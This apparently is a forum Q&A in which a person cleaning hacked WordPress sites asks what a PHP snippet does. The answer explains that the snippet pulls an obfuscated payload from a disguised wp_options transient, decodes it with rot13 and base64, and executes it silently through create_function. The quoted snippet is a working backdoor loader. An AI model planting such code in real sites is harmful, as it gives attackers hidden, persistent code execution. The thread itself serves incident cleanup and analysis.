Hacked Code Decoded

Question

I'm cleaning some hacked wordpress sites right now, but can't work out what this code actually does. Thought it would probably be useful to know. Can anyone help me decipher it?

$z=get_option("_site_transient_poptags_29129c90ada88ec96b7881049ab64b45"); 
$z=base64_decode(str_rot13($z['photo'])); if(strpos($z,"5F88EE48")!==false)
{ $_z=create_function("",$z); @$_z(); }

Answer 1

get_option will look at table wp_options for a key with that name _site_transient_poptags_29129c90ada88ec96b7881049ab64b45

it's the same as doing

select option_value from wp_options where option_name='_site_transient_poptags_29129c90ada88ec96b7881049ab64b45';

Watever that option_value is, the get_options will try to unserialize it before returning it. This is where it gets nasty, because unserialized data can be of any type. In this case option_value was a string which got unserialized to an array.

This array probably has one or more key=>value pairs. In this case, the one that matters is under the photo key. The value of that key is rot13d and base64_decoded. Both rot13 and base64_decode parts are only meant to 'translate' what will appear as random characters and store a readable string into the variable $z. It's as elaborated as spelling it backwards.

If the variable $z contains the substring 5F88EE48 then it will create an anonymous function, whose content is the value of $z (which means it performs an evaluation of $z) and it inmediately fires itself with the @ error supressor character, in order not to raise errors, exceptions or leave logs.

As you might know, if your site was compromised there is no real clean method but to reinstall the code, and even if you do, you might still have compromised fields in your DB. This is like peeing on a pool and then trying to get the pee out of it.